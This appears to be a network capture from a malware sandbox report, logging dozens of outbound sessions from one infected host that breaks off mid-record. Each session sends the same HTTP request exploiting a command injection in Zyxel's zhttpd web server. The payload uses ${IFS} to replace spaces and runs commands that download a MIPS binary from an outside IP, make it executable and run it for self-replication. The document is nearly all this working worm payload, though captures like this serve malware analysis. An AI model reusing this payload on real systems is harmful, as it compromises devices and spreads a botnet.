                                      Jan 19, 2024 17:29:20.521034002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1107192.168.2.1452220166.134.99.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521059036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1108192.168.2.1438954223.109.65.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521100044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1109192.168.2.1450868221.52.72.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521131992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1110192.168.2.1457136129.249.130.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521174908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1111192.168.2.1457608213.240.2.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521219969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1112192.168.2.1449908159.148.64.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521251917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1113192.168.2.145019825.231.114.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521341085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1114192.168.2.1455260220.124.47.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521377087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1115192.168.2.143583070.199.208.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521411896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1116192.168.2.1445044153.254.153.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521445036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1117192.168.2.145515643.2.110.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521502972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1118192.168.2.1454926107.174.13.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521557093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1119192.168.2.143325634.52.117.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521586895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1120192.168.2.1435914155.144.38.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521645069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1121192.168.2.145847849.60.208.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521688938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1122192.168.2.1454484208.226.145.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521718979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1123192.168.2.1442214189.223.190.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521764040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1124192.168.2.145213275.15.65.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521800041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1125192.168.2.1450446170.18.185.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521842003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1126192.168.2.1438772166.78.166.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521878004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1127192.168.2.145001227.237.120.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521900892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1128192.168.2.1433404166.172.92.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.521955013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1129192.168.2.144985859.231.25.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522015095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1130192.168.2.1437244155.160.175.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522037029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1131192.168.2.143596093.57.214.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522072077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1132192.168.2.144466668.13.89.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522095919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1133192.168.2.1434206202.44.168.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522149086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1134192.168.2.1435156194.146.107.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522192955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1135192.168.2.1453874163.38.24.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522238970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1136192.168.2.1438008149.64.7.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522289991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1137192.168.2.1450528150.97.251.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522336006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1138192.168.2.1454558103.154.175.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522403955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1139192.168.2.1444154204.78.212.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522404909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1140192.168.2.144235096.142.74.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522438049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1141192.168.2.1439712219.162.93.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522490978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1142192.168.2.1459460174.194.131.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522537947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1143192.168.2.143763089.55.240.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522594929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1144192.168.2.1441258203.240.97.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522636890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1145192.168.2.1447722130.197.135.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522694111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1146192.168.2.1458582185.65.33.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522732973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1147192.168.2.1452272102.182.219.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522768974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1148192.168.2.146021627.143.49.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522789955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1149192.168.2.143930257.27.23.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522838116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1150192.168.2.143511888.77.3.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522875071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1151192.168.2.1451014128.143.78.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522923946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1152192.168.2.14452128.87.4.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.522962093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1153192.168.2.145871286.147.222.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523004055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1154192.168.2.145506290.166.191.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523050070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1155192.168.2.1447674209.159.46.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523078918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1156192.168.2.145498472.193.57.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523129940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1157192.168.2.145479099.225.129.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523183107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1158192.168.2.143905052.229.53.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523221970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1159192.168.2.145828490.237.13.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523253918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1160192.168.2.1448130144.68.240.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523294926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1161192.168.2.143715052.61.86.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523345947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1162192.168.2.1454752122.163.68.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523370028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1163192.168.2.145256694.66.23.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523422956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1164192.168.2.144825464.66.158.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523458004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1165192.168.2.1459936164.84.9.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523510933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1166192.168.2.1438428217.0.92.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523549080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1167192.168.2.1457260170.104.176.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523605108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1168192.168.2.144093051.201.55.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523642063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1169192.168.2.1450204176.152.99.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.523690939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1170192.168.2.1437262145.137.236.38443
                                      TimestampBytes transferredDirectionData
